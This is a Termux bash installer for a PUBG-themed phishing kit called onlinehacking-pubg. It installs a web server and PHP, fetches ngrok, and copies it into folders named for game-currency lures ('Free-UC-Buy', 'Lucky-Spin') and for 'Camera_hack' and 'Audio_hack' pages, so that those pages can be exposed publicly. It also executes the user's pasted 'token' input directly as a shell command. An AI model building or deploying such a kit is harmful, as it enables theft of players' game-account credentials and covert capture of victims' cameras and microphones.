#!/data/data/com.termux/files/usr/bin/bash
clear
echo 
echo 
echo -e "\e[1;33m[\e[0m\e[1;77m~\e[0m\e[1;33m]\e[0m\e[1;32m Installing The Game Phishing Tool Please Wait....  - Onine Hacking \e[0m"
echo
termux-setup-storage
pkg update -y > /dev/null 2>&1
apt-get install apache2 -y
apt install php -y
apt install jq -y
apt install curl -y
apt install zip -y
pkg install wget -y
pkg install ncurses-utils -y
clear
echo
echo
echo -e "\e[31m[\e[32m~\e[31m]\e[33m Instaling ngrok ... \e[m "
echo
wget https://github.com/Linux-Droid/Ngrok/raw/master/Ngrok_Linux_Droid.zip >> /dev/null 2>&1
echo -e "\e[31m[\e[32m~\e[31m]\e[33m Successfuly installed \e[m "
echo
echo -e "\e[31m[\e[32m~\e[31m]\e[33m Inflating ngrok \e[m "
sleep 2
unzip Ngrok_Linux_Droid.zip >> /dev/null 2>&1 && rm -rf Ngrok_Linux_Droid.zip >> /dev/null 2>&1
echo
echo -e "\e[31m[\e[32m~\e[31m]\e[33m Done \e[m "
sleep 2
chmod +x ngrok
cp -R ngrok phs/BonusChallenge-Free-Gift-OH/
cp -R ngrok phs/Free-UC-Buy-OH/
cp -R ngrok phs/Lucky-Spin-OH/
cp -R ngrok phs/Camera_hack 
cp -R ngrok phs/Audio_hack
clear
echo ""
echo ""
echo -e "\e[31m[\e[32m*\e[31m]\e[33m Visit ngrok.com \e[m "
sleep 2
echo " "
echo -e "\e[31m[\e[32m*\e[31m]\e[33m Sign up & get ngrok authtoken \e[m "
sleep 1
echo " "
read -p $'\e[31m[\e[32m*\e[31m]\e[33m Paste Your Ngrok Token [Ex. ./ngrok authtoken ] : \e[0m' token
$token >> /dev/null 2>&1
sleep 1
clear
echo
echo -e "\e[92m[+] Setting up Online Hacking Game Tool  \e[m "
echo 
cp -R phs /data/data/com.termux/files/usr/bin
cp -R onlinehacking-pubg /data/data/com.termux/files/usr/bin
###########XXXXXXXXXXXXX####################
#     JUST LEARNING KEEP SUPPORTING        #
############XXXXXXXXXXXX####################
echo -e "\e[92m[+] To run the tool from anywhere simply type : onlinehacking-pubg \e[m "
echo 
#####################################
#           THANKYOU                #
#####################################
